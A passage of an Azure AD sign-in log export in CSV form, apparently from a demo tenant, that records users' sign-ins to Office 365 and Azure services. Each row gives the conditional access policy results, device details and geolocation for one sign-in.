'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:09,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",db359221-fdda-4bf1-8b37-6f46cf570e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,db359221-fdda-4bf1-8b37-6f46cf570e00,SigninLogs,Sucess,41.90428925,-85.99833679
+1286,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:43.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,6d87281e-de98-4413-aeba-55e09212b0b1,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fba8e30d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,fbcf3a57-b92a-4bcf-a38d-09fba8e30d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1287,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4351f994-5f8b-4935-a539-f78746cfcafc,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'MeganB MCAS Proxy', 'result': 'success', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",fbcf3a57-b92a-4bcf-a38d-09fbe5e30d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,fbcf3a57-b92a-4bcf-a38d-09fbe5e30d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1288,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:03.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,aff28126-cdfd-4279-9176-0e2c926de88f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft Cloud App Security,05a65629-4c1b-48c1-a78b-804c4abdd4af,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:00,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",71693871-d407-425c-bffa-acefa6550b00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,71693871-d407-425c-bffa-acefa6550b00,SigninLogs,Sucess,41.90428925,-85.99833679
+1289,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:37.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",f4385ae5-d471-4f39-91b1-8dc5707a2a00,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,f4385ae5-d471-4f39-91b1-8dc5707a2a00,SigninLogs,Sucess,51.4458313,-0.969720006
+1290,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:25.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",96e79e8b-3114-4cfe-a638-a8025f352900,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,96e79e8b-3114-4cfe-a638-a8025f352900,SigninLogs,Sucess,51.4458313,-0.969720006
+1291,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:33.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e3ba3aa2-0c66-4d24-b7a8-4ef82150d08a,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:11,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",65ce963c-c870-4311-8389-19e58fdf0c00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,65ce963c-c870-4311-8389-19e58fdf0c00,SigninLogs,Sucess,41.90428925,-85.99833679
+1292,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,12:41.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5adc67c6-0794-4620-bc13-1ba7e9a087af,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 13:12,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",875c831a-2c9c-4e0a-b7c7-b8304d1e0d00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,875c831a-2c9c-4e0a-b7c7-b8304d1e0d00,SigninLogs,Sucess,41.90428925,-85.99833679
+1293,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,11:31.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,82ad5bdb-8911-4df0-8861-27ac3d0f30b0,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 